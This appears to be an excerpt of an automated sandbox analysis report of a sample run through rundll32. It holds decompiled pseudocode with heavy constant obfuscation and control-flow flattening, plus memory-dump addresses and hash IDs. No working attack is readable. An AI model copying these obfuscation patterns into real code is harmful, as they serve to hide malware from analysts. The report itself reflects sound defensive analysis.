                                                                                                                                    				_v192 = _v192 ^ 0x175759c3;
                                                                                                                                    				_v256 = 0x23b549;
                                                                                                                                    				_v256 = _v256 + 0x5eb6;
                                                                                                                                    				_v256 = _v256 | 0xffb7bbff;
                                                                                                                                    				_v256 = _v256 ^ 0xffb807e9;
                                                                                                                                    				_v176 = 0xc1fdd5;
                                                                                                                                    				_v176 = _v176 >> 0xc;
                                                                                                                                    				_v176 = _v176 | 0x5151af8d;
                                                                                                                                    				_v176 = _v176 ^ 0x515c7a4b;
                                                                                                                                    				_v112 = 0xec5780;
                                                                                                                                    				_v112 = _v112 ^ 0x97b4c021;
                                                                                                                                    				_v112 = _v112 ^ 0x9750bd7e;
                                                                                                                                    				_v180 = 0x591b41;
                                                                                                                                    				_v180 = _v180 + 0x207e;
                                                                                                                                    				_v180 = _v180 + 0xffffc81d;
                                                                                                                                    				_v180 = _v180 ^ 0x005ca8dc;
                                                                                                                                    				_v68 = 0x76fd1d;
                                                                                                                                    				_t675 = 0x5c52c4a;
                                                                                                                                    				_v68 = _v68 | 0x9e2d4356;
                                                                                                                                    				_v68 = _v68 ^ 0x9e728261;
                                                                                                                                    				_v76 = 0xf22a3;
                                                                                                                                    				_v76 = _v76 | 0x9c703035;
                                                                                                                                    				_v76 = _v76 ^ 0x9c7b5f20;
                                                                                                                                    				_v220 = 0x3decab;
                                                                                                                                    				_v220 = _v220 << 8;
                                                                                                                                    				_v220 = _v220 ^ 0x53082a5e;
                                                                                                                                    				_v220 = _v220 >> 0xd;
                                                                                                                                    				_v220 = _v220 ^ 0x0004d715;
                                                                                                                                    				_v84 = 0x6eb476;
                                                                                                                                    				_v84 = _v84 << 0xd;
                                                                                                                                    				_v84 = _v84 ^ 0xd68135de;
                                                                                                                                    				_v124 = 0x458e11;
                                                                                                                                    				_v124 = _v124 | 0x336f5b57;
                                                                                                                                    				_t607 = 0x43;
                                                                                                                                    				_v124 = _v124 / _t607;
                                                                                                                                    				_v124 = _v124 ^ 0x00c97d17;
                                                                                                                                    				_v156 = 0x7cba2c;
                                                                                                                                    				_t608 = 0x4b;
                                                                                                                                    				_v156 = _v156 / _t608;
                                                                                                                                    				_v156 = _v156 | 0x0b494d21;
                                                                                                                                    				_v156 = _v156 ^ 0x0b48f5d9;
                                                                                                                                    				_v36 = 0x519404;
                                                                                                                                    				_v36 = _v36 << 8;
                                                                                                                                    				_v36 = _v36 ^ 0x5195ba3f;
                                                                                                                                    				_v168 = 0xf13e55;
                                                                                                                                    				_v168 = _v168 | 0x95edbe5f;
                                                                                                                                    				_v168 = _v168 ^ 0xd6548190;
                                                                                                                                    				_v168 = _v168 ^ 0x43a3dbfd;
                                                                                                                                    				_v188 = 0xdd4a71;
                                                                                                                                    				_v188 = _v188 + 0xffff5bb0;
                                                                                                                                    				_v188 = _v188 >> 0xb;
                                                                                                                                    				_v188 = _v188 >> 6;
                                                                                                                                    				_v188 = _v188 ^ 0x000a03ec;
                                                                                                                                    				_v196 = 0x58b29f;
                                                                                                                                    				_t609 = 0x22;
                                                                                                                                    				_v196 = _v196 / _t609;
                                                                                                                                    				_v196 = _v196 + 0xffff713e;
                                                                                                                                    				_v196 = _v196 + 0xffff146a;
                                                                                                                                    				_v196 = _v196 ^ 0x000c9f67;
                                                                                                                                    				_v212 = 0xc056c;
                                                                                                                                    				_t610 = 0x45;
                                                                                                                                    				_v212 = _v212 * 0x51;
                                                                                                                                    				_v212 = _v212 >> 0xc;
                                                                                                                                    				_v212 = _v212 / _t610;
                                                                                                                                    				_v212 = _v212 ^ 0x0007774b;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t566 = 0x6c6f684;
                                                                                                                                    					while(1) {
                                                                                                                                    						L2:
                                                                                                                                    						_t611 = 0x92c3a26;
                                                                                                                                    						while(1) {
                                                                                                                                    							L3:
                                                                                                                                    							do {
                                                                                                                                    								while(1) {
                                                                                                                                    									L4:
                                                                                                                                    									_t685 = _t596 - _t675;
                                                                                                                                    									if(_t685 > 0) {
                                                                                                                                    										break;
                                                                                                                                    									}
                                                                                                                                    									if(_t685 == 0) {
                                                                                                                                    										E002D6BC6(_v124, _v32, _v156);
                                                                                                                                    										_t596 = 0x4bc1ff4;
                                                                                                                                    										goto L1;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t596 == 0x1d3710) {
                                                                                                                                    											_t596 = 0x6d0da1a;
                                                                                                                                    											continue;
                                                                                                                                    										} else {
                                                                                                                                    											if(_t596 == 0x19992af) {
                                                                                                                                    												_push(_t611);
                                                                                                                                    												_push(_t611);
                                                                                                                                    												_t573 = E002C7FF2(_v16);
                                                                                                                                    												__eflags = _t573;
                                                                                                                                    												_v20 = _t573;
                                                                                                                                    												_t660 = 0x19c2787;
                                                                                                                                    												_t596 =  !=  ? 0x19c2787 : 0x87f6c1b;
                                                                                                                                    												_t566 = 0x6c6f684;
                                                                                                                                    												_t611 = 0x92c3a26;
                                                                                                                                    												continue;
                                                                                                                                    											} else {
                                                                                                                                    												if(_t596 == _t660) {
                                                                                                                                    													_t575 = E002D7B05(_v16,  &_v32, _v28, _v216, _v72, _v164, _v248, _v40, _v80, _t611, _v192, _v256, _v20);
                                                                                                                                    													_t682 =  &(_t682[0xc]);
                                                                                                                                    													__eflags = _t575 - _v240;
                                                                                                                                    													_t611 = 0x92c3a26;
                                                                                                                                    													_t566 = 0x6c6f684;
                                                                                                                                    													_t596 =  ==  ? 0x92c3a26 : 0x4bc1ff4;
                                                                                                                                    													goto L3;
                                                                                                                                    												} else {
                                                                                                                                    													if(_t596 == 0x489cb15) {
                                                                                                                                    														_push(_v148);
                                                                                                                                    														_push(_v44);
                                                                                                                                    														_t577 = E002DDCF7(_v104, 0x2c18b4, __eflags);
                                                                                                                                    														_pop(_t633);
                                                                                                                                    														__eflags = E002E0B68(_t577,  &_v12, _v224, _v96, _t633,  &_v16, _v132, _v264, _v208, _v56, _v28, _v172) - _v116;
                                                                                                                                    														_t596 =  ==  ? 0x19992af : 0x87f6c1b;
                                                                                                                                    														E002CA8B0(_v48, _t577, _v88);
                                                                                                                                    														_t677 = _v24;
                                                                                                                                    														_t682 =  &(_t682[0xb]);
                                                                                                                                    														L24:
                                                                                                                                    														_t566 = 0x6c6f684;
                                                                                                                                    														_t611 = 0x92c3a26;
                                                                                                                                    														_t660 = 0x19c2787;
                                                                                                                                    														goto L25;
                                                                                                                                    													} else {
                                                                                                                                    														if(_t596 != 0x4bc1ff4) {
                                                                                                                                    															goto L25;
                                                                                                                                    														} else {
                                                                                                                                    															E002D8519(_v36, _v168, _v20);
                                                                                                                                    															_t596 = 0x87f6c1b;
                                                                                                                                    															while(1) {
                                                                                                                                    																L1:
                                                                                                                                    																_t566 = 0x6c6f684;
                                                                                                                                    																L2:
                                                                                                                                    																_t611 = 0x92c3a26;
                                                                                                                                    																L3:
                                                                                                                                    																goto L4;
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    									L28:
                                                                                                                                    									return _t680;
                                                                                                                                    								}
                                                                                                                                    								__eflags = _t596 - _t566;
                                                                                                                                    								if(_t596 == _t566) {
                                                                                                                                    									_t567 = E002D828A(_v68, _v76, _v220, _t677, _v120, 0x20, _v84, _v32);
                                                                                                                                    									_t682 =  &(_t682[6]);
                                                                                                                                    									_t596 = _t675;
                                                                                                                                    									__eflags = _t567 - _v60;
                                                                                                                                    									_t680 =  ==  ? 1 : _t680;
                                                                                                                                    									goto L24;
                                                                                                                                    								} else {
                                                                                                                                    									__eflags = _t596 - 0x6d0da1a;
                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                    										_push(_v272);
                                                                                                                                    										_push(_v160);
                                                                                                                                    										_t585 = E002DDCF7(_v268, 0x2c1884, __eflags);
                                                                                                                                    										_push(_v152);
                                                                                                                                    										_push(_v108);
                                                                                                                                    										_t588 = E002C9462(_t585, _v260,  &_v28, E002DDCF7(_v100, 0x2c1814, __eflags), _v92, _v144);
                                                                                                                                    										_t682 =  &(_t682[9]);
                                                                                                                                    										__eflags = _t588 - _v244;
                                                                                                                                    										_t596 =  ==  ? 0x489cb15 : 0x822e036;
                                                                                                                                    										E002CA8B0(_v228, _t585, _v236);
                                                                                                                                    										E002CA8B0(_v128, _t586, _v136);
                                                                                                                                    										_t677 = _v24;
                                                                                                                                    										_t675 = 0x5c52c4a;
                                                                                                                                    										goto L24;
                                                                                                                                    									} else {
                                                                                                                                    										__eflags = _t596 - 0x87f6c1b;
                                                                                                                                    										if(_t596 == 0x87f6c1b) {
                                                                                                                                    											E002C957D(_v28, _v188, _v196, _v204, _v212);
                                                                                                                                    										} else {
                                                                                                                                    											__eflags = _t596 - _t611;
                                                                                                                                    											if(_t596 != _t611) {
                                                                                                                                    												goto L25;
                                                                                                                                    											} else {
                                                                                                                                    												_t594 = E002CA81D(_v32, _a4, _v176, _v112, _v232, _a20, _v180);
                                                                                                                                    												_t682 =  &(_t682[5]);
                                                                                                                                    												__eflags = _t594 - _v184;
                                                                                                                                    												_t566 = 0x6c6f684;
                                                                                                                                    												_t596 =  ==  ? 0x6c6f684 : _t675;
                                                                                                                                    												goto L2;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								goto L28;
                                                                                                                                    								L25:
                                                                                                                                    								__eflags = _t596 - 0x822e036;
                                                                                                                                    							} while (__eflags != 0);
                                                                                                                                    							goto L28;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}

                                                                                                                                    0x002db401
                                                                                                                                    0x002db40c
                                                                                                                                    0x002db417
                                                                                                                                    0x002db427
                                                                                                                                    0x002db42e
                                                                                                                                    0x002db439
                                                                                                                                    0x002db444
                                                                                                                                    0x002db44c
                                                                                                                                    0x002db457
                                                                                                                                    0x002db45f
                                                                                                                                    0x002db467
                                                                                                                                    0x002db46f
                                                                                                                                    0x002db477
                                                                                                                                    0x002db47f
                                                                                                                                    0x002db48a
                                                                                                                                    0x002db495
                                                                                                                                    0x002db4a0
                                                                                                                                    0x002db4a8
                                                                                                                                    0x002db4ad
                                                                                                                                    0x002db4b5
                                                                                                                                    0x002db4bd
                                                                                                                                    0x002db4c5
                                                                                                                                    0x002db4d0
                                                                                                                                    0x002db4db
                                                                                                                                    0x002db4e6
                                                                                                                                    0x002db4ee
                                                                                                                                    0x002db4f6
                                                                                                                                    0x002db4fe
                                                                                                                                    0x002db506
                                                                                                                                    0x002db511
                                                                                                                                    0x002db51c
                                                                                                                                    0x002db527
                                                                                                                                    0x002db52f
                                                                                                                                    0x002db537
                                                                                                                                    0x002db53c
                                                                                                                                    0x002db544
                                                                                                                                    0x002db54c
                                                                                                                                    0x002db554
                                                                                                                                    0x002db55c
                                                                                                                                    0x002db564
                                                                                                                                    0x002db56c
                                                                                                                                    0x002db574
                                                                                                                                    0x002db579
                                                                                                                                    0x002db581
                                                                                                                                    0x002db589
                                                                                                                                    0x002db594
                                                                                                                                    0x002db59f
                                                                                                                                    0x002db5aa
                                                                                                                                    0x002db5b2
                                                                                                                                    0x002db5ba
                                                                                                                                    0x002db5c2
                                                                                                                                    0x002db5cc
                                                                                                                                    0x002db5d7
                                                                                                                                    0x002db5dc
                                                                                                                                    0x002db5e7
                                                                                                                                    0x002db5f2
                                                                                                                                    0x002db5fd
                                                                                                                                    0x002db608
                                                                                                                                    0x002db613
                                                                                                                                    0x002db61b
                                                                                                                                    0x002db620
                                                                                                                                    0x002db628
                                                                                                                                    0x002db62d
                                                                                                                                    0x002db635
                                                                                                                                    0x002db640
                                                                                                                                    0x002db648
                                                                                                                                    0x002db653
                                                                                                                                    0x002db65e
                                                                                                                                    0x002db672
                                                                                                                                    0x002db677
                                                                                                                                    0x002db680
                                                                                                                                    0x002db68b
                                                                                                                                    0x002db69d
                                                                                                                                    0x002db6a2
                                                                                                                                    0x002db6ab
                                                                                                                                    0x002db6b6
                                                                                                                                    0x002db6c1
                                                                                                                                    0x002db6cc
                                                                                                                                    0x002db6d4
                                                                                                                                    0x002db6df
                                                                                                                                    0x002db6e7
                                                                                                                                    0x002db6ef
                                                                                                                                    0x002db6f7
                                                                                                                                    0x002db6ff
                                                                                                                                    0x002db707
                                                                                                                                    0x002db70f
                                                                                                                                    0x002db714
                                                                                                                                    0x002db719
                                                                                                                                    0x002db721
                                                                                                                                    0x002db72d
                                                                                                                                    0x002db732
                                                                                                                                    0x002db738
                                                                                                                                    0x002db740
                                                                                                                                    0x002db748
                                                                                                                                    0x002db750
                                                                                                                                    0x002db75d
                                                                                                                                    0x002db75e
                                                                                                                                    0x002db762
                                                                                                                                    0x002db76d
                                                                                                                                    0x002db771
                                                                                                                                    0x002db779
                                                                                                                                    0x002db779
                                                                                                                                    0x002db779
                                                                                                                                    0x002db77e
                                                                                                                                    0x002db77e
                                                                                                                                    0x002db77e
                                                                                                                                    0x002db783
                                                                                                                                    0x002db783
                                                                                                                                    0x002db788
                                                                                                                                    0x002db788
                                                                                                                                    0x002db788
                                                                                                                                    0x002db788
                                                                                                                                    0x002db78a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002db790
                                                                                                                                    0x002db969
                                                                                                                                    0x002db96f
                                                                                                                                    0x00000000
                                                                                                                                    0x002db796
                                                                                                                                    0x002db79c
                                                                                                                                    0x002db94a
                                                                                                                                    0x00000000
                                                                                                                                    0x002db7a2
                                                                                                                                    0x002db7a8
                                                                                                                                    0x002db91c
                                                                                                                                    0x002db91d
                                                                                                                                    0x002db91e
                                                                                                                                    0x002db924
                                                                                                                                    0x002db926
                                                                                                                                    0x002db933
                                                                                                                                    0x002db938
                                                                                                                                    0x002db93b
                                                                                                                                    0x002db940
                                                                                                                                    0x00000000
                                                                                                                                    0x002db7ae
                                                                                                                                    0x002db7b0
                                                                                                                                    0x002db8dc
                                                                                                                                    0x002db8e3
                                                                                                                                    0x002db8ef
                                                                                                                                    0x002db8f1
                                                                                                                                    0x002db8f6
                                                                                                                                    0x002db8fb
                                                                                                                                    0x00000000
                                                                                                                                    0x002db7b6
                                                                                                                                    0x002db7bc
                                                                                                                                    0x002db7e9
                                                                                                                                    0x002db7f5
                                                                                                                                    0x002db803
                                                                                                                                    0x002db809
                                                                                                                                    0x002db866
                                                                                                                                    0x002db874
                                                                                                                                    0x002db877
                                                                                                                                    0x002db87c
                                                                                                                                    0x002db883
                                                                                                                                    0x002dbada
                                                                                                                                    0x002dbada
                                                                                                                                    0x002dbadf
                                                                                                                                    0x002dbae4
                                                                                                                                    0x00000000
                                                                                                                                    0x002db7be
                                                                                                                                    0x002db7c4
                                                                                                                                    0x00000000
                                                                                                                                    0x002db7ca
                                                                                                                                    0x002db7dc
                                                                                                                                    0x002db7e2
                                                                                                                                    0x002db779
                                                                                                                                    0x002db779
                                                                                                                                    0x002db779
                                                                                                                                    0x002db77e
                                                                                                                                    0x002db77e
                                                                                                                                    0x002db783
                                                                                                                                    0x00000000
                                                                                                                                    0x002db783
                                                                                                                                    0x002db779
                                                                                                                                    0x002db7c4
                                                                                                                                    0x002db7bc
                                                                                                                                    0x002db7b0
                                                                                                                                    0x002db7a8
                                                                                                                                    0x002db79c
                                                                                                                                    0x002dbb18
                                                                                                                                    0x002dbb22
                                                                                                                                    0x002dbb22
                                                                                                                                    0x002db979
                                                                                                                                    0x002db97b
                                                                                                                                    0x002dbabf
                                                                                                                                    0x002dbad0
                                                                                                                                    0x002dbad3
                                                                                                                                    0x002dbad5
                                                                                                                                    0x002dbad7
                                                                                                                                    0x00000000
                                                                                                                                    0x002db981
                                                                                                                                    0x002db981
                                                                                                                                    0x002db987
                                                                                                                                    0x002db9e7
                                                                                                                                    0x002db9f0

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: &:,$&:,$&:,$&:,$/i=$GA$Kz\Q$W[o3$_}+$gkv$v$(a$ve$~ $#$1P
                                                                                                                                    • API String ID: 0-1587349264
                                                                                                                                    • Opcode ID: b8769f0eaec7c47283904a10a4bc14e23a937daabdab7cc6b0ebd2edb2c5a7b3
                                                                                                                                    • Instruction ID: ef7c1c78c4352f49727ac33eaaf44c001909dbb7732a6e66df4fe93dfbed7413
                                                                                                                                    • Opcode Fuzzy Hash: b8769f0eaec7c47283904a10a4bc14e23a937daabdab7cc6b0ebd2edb2c5a7b3
                                                                                                                                    • Instruction Fuzzy Hash: B9520F711093819FD7B9CF61C48AB8BBBE1BBC4308F10891DE6DA96260D7B18959CF53
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E002D5CC4() {
                                                                                                                                    				char _v520;
                                                                                                                                    				char _v1040;
                                                                                                                                    				char _v1560;
                                                                                                                                    				void* _v1572;
                                                                                                                                    				intOrPtr _v1576;
                                                                                                                                    				signed int _v1580;
                                                                                                                                    				signed int _v1584;
                                                                                                                                    				signed int _v1588;
                                                                                                                                    				signed int _v1592;
                                                                                                                                    				signed int _v1596;
                                                                                                                                    				signed int _v1600;
                                                                                                                                    				signed int _v1604;
                                                                                                                                    				signed int _v1608;
                                                                                                                                    				signed int _v1612;
                                                                                                                                    				signed int _v1616;
                                                                                                                                    				signed int _v1620;
                                                                                                                                    				signed int _v1624;
                                                                                                                                    				signed int _v1628;
                                                                                                                                    				signed int _v1632;
                                                                                                                                    				signed int _v1636;
                                                                                                                                    				signed int _v1640;
                                                                                                                                    				signed int _v1644;
                                                                                                                                    				signed int _v1648;
                                                                                                                                    				signed int _v1652;
                                                                                                                                    				signed int _v1656;
                                                                                                                                    				signed int _v1660;
                                                                                                                                    				signed int _v1664;
                                                                                                                                    				signed int _v1668;
                                                                                                                                    				signed int _v1672;
                                                                                                                                    				signed int _v1676;
                                                                                                                                    				signed int _v1680;
                                                                                                                                    				signed int _v1684;
                                                                                                                                    				signed int _v1688;
                                                                                                                                    				signed int _v1692;
                                                                                                                                    				signed int _v1696;
                                                                                                                                    				signed int _v1700;
                                                                                                                                    				signed int _v1704;
                                                                                                                                    				signed int _v1708;
                                                                                                                                    				signed int _v1712;
                                                                                                                                    				signed int _v1716;
                                                                                                                                    				signed int _v1720;
                                                                                                                                    				signed int _v1724;
                                                                                                                                    				signed int _v1728;
                                                                                                                                    				signed int _v1732;
                                                                                                                                    				signed int _v1736;
                                                                                                                                    				signed int _v1740;
                                                                                                                                    				signed int _v1744;
                                                                                                                                    				signed int _v1748;
                                                                                                                                    				signed int _v1752;
                                                                                                                                    				signed int _v1756;
                                                                                                                                    				signed int _v1760;
                                                                                                                                    				signed int _v1764;
                                                                                                                                    				void* _t481;
                                                                                                                                    				signed int _t496;
                                                                                                                                    				void* _t499;
                                                                                                                                    				intOrPtr _t503;
                                                                                                                                    				void* _t539;
                                                                                                                                    				signed int _t550;
                                                                                                                                    				signed int _t551;
                                                                                                                                    				signed int _t552;
                                                                                                                                    				intOrPtr _t553;
                                                                                                                                    				intOrPtr* _t554;
                                                                                                                                    				signed int _t555;
                                                                                                                                    				signed int _t556;
                                                                                                                                    				signed int _t557;
                                                                                                                                    				signed int _t558;
                                                                                                                                    				signed int _t559;
                                                                                                                                    				signed int _t560;
                                                                                                                                    				signed int _t561;
                                                                                                                                    				signed int _t562;
                                                                                                                                    				signed int _t563;
                                                                                                                                    				signed int _t564;
                                                                                                                                    				signed int _t567;
                                                                                                                                    				signed int* _t568;
                                                                                                                                    				void* _t572;
                                                                                                                                    
                                                                                                                                    				_t568 =  &_v1764;
                                                                                                                                    				_v1576 = 0x9a4c1d;
                                                                                                                                    				_v1596 = _v1596 & 0x00000000;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_t499 = 0x9b91574;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_v1684 = 0xe59dc4;
                                                                                                                                    				_v1684 = _v1684 | 0xd0a48cbc;
                                                                                                                                    				_v1684 = _v1684 + 0xffff2e59;
                                                                                                                                    				_v1684 = _v1684 ^ 0xd0e4cc7c;
                                                                                                                                    				_v1752 = 0x51b4b3;
                                                                                                                                    				_v1752 = _v1752 ^ 0x5d9a17a0;
                                                                                                                                    				_t550 = 0xb;
                                                                                                                                    				_t555 = 0x76;
                                                                                                                                    				_v1752 = _v1752 * 0xb;
                                                                                                                                    				_v1752 = _v1752 ^ 0x54bb96eb;
                                                                                                                                    				_v1752 = _v1752 ^ 0x53749705;
                                                                                                                                    				_v1632 = 0xaf6c30;
                                                                                                                                    				_v1632 = _v1632 << 6;
                                                                                                                                    				_v1632 = _v1632 ^ 0x2bdb0c02;
                                                                                                                                    				_v1720 = 0x499d0c;
                                                                                                                                    				_v1720 = _v1720 | 0xb1a117f5;
                                                                                                                                    				_v1720 = _v1720 / _t550;
                                                                                                                                    				_v1720 = _v1720 + 0x97c7;
                                                                                                                                    				_v1720 = _v1720 ^ 0x102d1aad;
                                                                                                                                    				_v1704 = 0xc8e3b3;
                                                                                                                                    				_v1704 = _v1704 * 0x32;
                                                                                                                                    				_v1704 = _v1704 ^ 0x0819b8db;
                                                                                                                                    				_v1704 = _v1704 | 0x44ca091a;
                                                                                                                                    				_v1704 = _v1704 ^ 0x6fefc93f;
                                                                                                                                    				_v1668 = 0xa62014;
                                                                                                                                    				_v1668 = _v1668 | 0xeabb5dd4;
                                                                                                                                    				_v1668 = _v1668 * 0x68;
                                                                                                                                    				_v1668 = _v1668 ^ 0x5dcb1e30;
                                                                                                                                    				_v1744 = 0xf6f234;
                                                                                                                                    				_v1744 = _v1744 * 0x2a;
                                                                                                                                    				_v1744 = _v1744 ^ 0x80b741fb;
                                                                                                                                    				_v1744 = _v1744 / _t555;
                                                                                                                                    				_v1744 = _v1744 ^ 0x0165dd5f;
                                                                                                                                    				_v1584 = 0x312e96;
                                                                                                                                    				_v1584 = _v1584 + 0xffff2d5f;
                                                                                                                                    				_v1584 = _v1584 ^ 0x003c0d9d;
                                                                                                                                    				_v1712 = 0xa058cf;
                                                                                                                                    				_v1712 = _v1712 << 0xd;
                                                                                                                                    				_v1712 = _v1712 >> 8;
                                                                                                                                    				_t556 = 0x70;
                                                                                                                                    				_v1712 = _v1712 / _t556;
                                                                                                                                    				_v1712 = _v1712 ^ 0x000e60b1;
                                                                                                                                    				_v1624 = 0xe892f9;
                                                                                                                                    				_v1624 = _v1624 | 0x8c579b60;
                                                                                                                                    				_v1624 = _v1624 ^ 0x8cfff2b4;
                                                                                                                                    				_v1616 = 0xaf548d;
                                                                                                                                    				_v1616 = _v1616 << 0xe;
                                                                                                                                    				_v1616 = _v1616 ^ 0xd52eab36;
                                                                                                                                    				_v1732 = 0xb05ea2;
                                                                                                                                    				_v1732 = _v1732 * 0x22;
                                                                                                                                    				_t557 = 0x7e;
                                                                                                                                    				_v1732 = _v1732 / _t557;
                                                                                                                                    				_t558 = 0x6e;
                                                                                                                                    				_v1732 = _v1732 / _t558;
                                                                                                                                    				_v1732 = _v1732 ^ 0x000d3439;
                                                                                                                                    				_v1592 = 0x913a71;
                                                                                                                                    				_v1592 = _v1592 + 0xffff7440;
                                                                                                                                    				_v1592 = _v1592 ^ 0x0095b07c;
                                                                                                                                    				_v1696 = 0x599322;
                                                                                                                                    				_v1696 = _v1696 / _t550;
                                                                                                                                    				_v1696 = _v1696 ^ 0xb13d8f34;
                                                                                                                                    				_v1696 = _v1696 ^ 0xb1384542;
                                                                                                                                    				_v1644 = 0xa16dfa;
                                                                                                                                    				_v1644 = _v1644 ^ 0xe1099bcb;
                                                                                                                                    				_v1644 = _v1644 ^ 0xe1a9d34e;
                                                                                                                                    				_v1648 = 0xb4e11f;
                                                                                                                                    				_v1648 = _v1648 ^ 0x38d2ca48;
                                                                                                                                    				_v1648 = _v1648 ^ 0x386e0f93;
                                                                                                                                    				_v1608 = 0x5a22b;
                                                                                                                                    				_t559 = 0x77;
                                                                                                                                    				_t551 = 0x6a;
                                                                                                                                    				_v1608 = _v1608 * 0x7a;
                                                                                                                                    				_v1608 = _v1608 ^ 0x02a61538;
                                                                                                                                    				_v1680 = 0xefbd86;
                                                                                                                                    				_v1680 = _v1680 ^ 0x59656a46;
                                                                                                                                    				_v1680 = _v1680 + 0xffff500f;
                                                                                                                                    				_v1680 = _v1680 ^ 0x598ded80;
                                                                                                                                    				_v1724 = 0x3ee43e;
                                                                                                                                    				_v1724 = _v1724 + 0x7543;
                                                                                                                                    				_v1724 = _v1724 ^ 0x2e29824a;
                                                                                                                                    				_v1724 = _v1724 + 0xffff57f4;
                                                                                                                                    				_v1724 = _v1724 ^ 0x2e1fc8aa;
                                                                                                                                    				_v1580 = 0xa6d208;
                                                                                                                                    				_v1580 = _v1580 | 0x568c9bfe;
                                                                                                                                    				_v1580 = _v1580 ^ 0x56ae214d;
                                                                                                                                    				_v1636 = 0x6d5924;
                                                                                                                                    				_v1636 = _v1636 ^ 0x925c239d;
                                                                                                                                    				_v1636 = _v1636 ^ 0x923215a4;
                                                                                                                                    				_v1664 = 0x695adc;
                                                                                                                                    				_v1664 = _v1664 / _t559;
                                                                                                                                    				_v1664 = _v1664 + 0x9e91;
                                                                                                                                    				_v1664 = _v1664 ^ 0x000b7b12;
                                                                                                                                    				_v1728 = 0x27fcd;
                                                                                                                                    				_v1728 = _v1728 << 7;
                                                                                                                                    				_v1728 = _v1728 >> 0xd;
                                                                                                                                    				_v1728 = _v1728 / _t551;
                                                                                                                                    				_v1728 = _v1728 ^ 0x000e8750;
                                                                                                                                    				_v1660 = 0x324e38;
                                                                                                                                    				_t560 = 0xd;
                                                                                                                                    				_v1660 = _v1660 / _t560;
                                                                                                                                    				_v1660 = _v1660 ^ 0xc6795c1b;
                                                                                                                                    				_v1660 = _v1660 ^ 0xc67cbc2f;
                                                                                                                                    				_v1672 = 0xd5264d;
                                                                                                                                    				_v1672 = _v1672 ^ 0x5df7965f;
                                                                                                                                    				_v1672 = _v1672 << 0xa;
                                                                                                                                    				_v1672 = _v1672 ^ 0x8ac02156;
                                                                                                                                    				_v1760 = 0x48e2ee;
                                                                                                                                    				_t213 =  &_v1760; // 0x48e2ee
                                                                                                                                    				_t561 = 0x2d;
                                                                                                                                    				_v1760 =  *_t213 / _t561;
                                                                                                                                    				_v1760 = _v1760 ^ 0xd2c1db30;
                                                                                                                                    				_v1760 = _v1760 ^ 0xa53e2936;
                                                                                                                                    				_v1760 = _v1760 ^ 0x77fe21cd;
                                                                                                                                    				_v1740 = 0xf20c88;
                                                                                                                                    				_v1740 = _v1740 / _t551;
                                                                                                                                    				_v1740 = _v1740 | 0xd96c60ad;
                                                                                                                                    				_v1740 = _v1740 << 0xc;
                                                                                                                                    				_v1740 = _v1740 ^ 0xe68a7191;
                                                                                                                                    				_v1588 = 0x8e0aab;
                                                                                                                                    				_t562 = 0x1b;
                                                                                                                                    				_v1588 = _v1588 * 0x60;
                                                                                                                                    				_v1588 = _v1588 ^ 0x354c6054;
                                                                                                                                    				_v1748 = 0x4e8d34;
                                                                                                                                    				_v1748 = _v1748 + 0x9e68;
                                                                                                                                    				_v1748 = _v1748 ^ 0xb589d4ed;
                                                                                                                                    				_v1748 = _v1748 ^ 0xb12a6144;
                                                                                                                                    				_v1748 = _v1748 ^ 0x04e7453a;
                                                                                                                                    				_v1756 = 0x3003da;
                                                                                                                                    				_v1756 = _v1756 << 2;
                                                                                                                                    				_v1756 = _v1756 + 0x3550;
                                                                                                                                    				_v1756 = _v1756 + 0xffff4840;
                                                                                                                                    				_v1756 = _v1756 ^ 0x00bf12fa;
                                                                                                                                    				_v1764 = 0x8da8e8;
                                                                                                                                    				_v1764 = _v1764 * 0x70;
                                                                                                                                    				_v1764 = _v1764 | 0x3d3a45ac;
                                                                                                                                    				_v1764 = _v1764 + 0xffff8f06;
                                                                                                                                    				_v1764 = _v1764 ^ 0x3dfaa955;
                                                                                                                                    				_v1600 = 0x16815c;
                                                                                                                                    				_v1600 = _v1600 | 0x74adb72e;
                                                                                                                                    				_v1600 = _v1600 ^ 0x74bac2ad;
                                                                                                                                    				_v1736 = 0x173f97;
                                                                                                                                    				_v1736 = _v1736 + 0x884f;
                                                                                                                                    				_v1736 = _v1736 ^ 0x83e17d26;
                                                                                                                                    				_v1736 = _v1736 ^ 0x7950511a;
                                                                                                                                    				_v1736 = _v1736 ^ 0xfaacae3a;
                                                                                                                                    				_v1640 = 0x9a0364;
                                                                                                                                    				_v1640 = _v1640 >> 4;
                                                                                                                                    				_v1640 = _v1640 ^ 0x000747da;
                                                                                                                                    				_v1700 = 0xbe1482;
                                                                                                                                    				_v1700 = _v1700 ^ 0x7ff54444;
                                                                                                                                    				_v1700 = _v1700 << 4;
                                                                                                                                    				_v1700 = _v1700 + 0xffff3bda;
                                                                                                                                    				_v1700 = _v1700 ^ 0xf4b38ed0;
                                                                                                                                    				_v1708 = 0xf0c015;
                                                                                                                                    				_v1708 = _v1708 >> 2;
                                                                                                                                    				_v1708 = _v1708 * 0x59;
                                                                                                                                    				_v1708 = _v1708 >> 0xd;
                                                                                                                                    				_v1708 = _v1708 ^ 0x00007652;
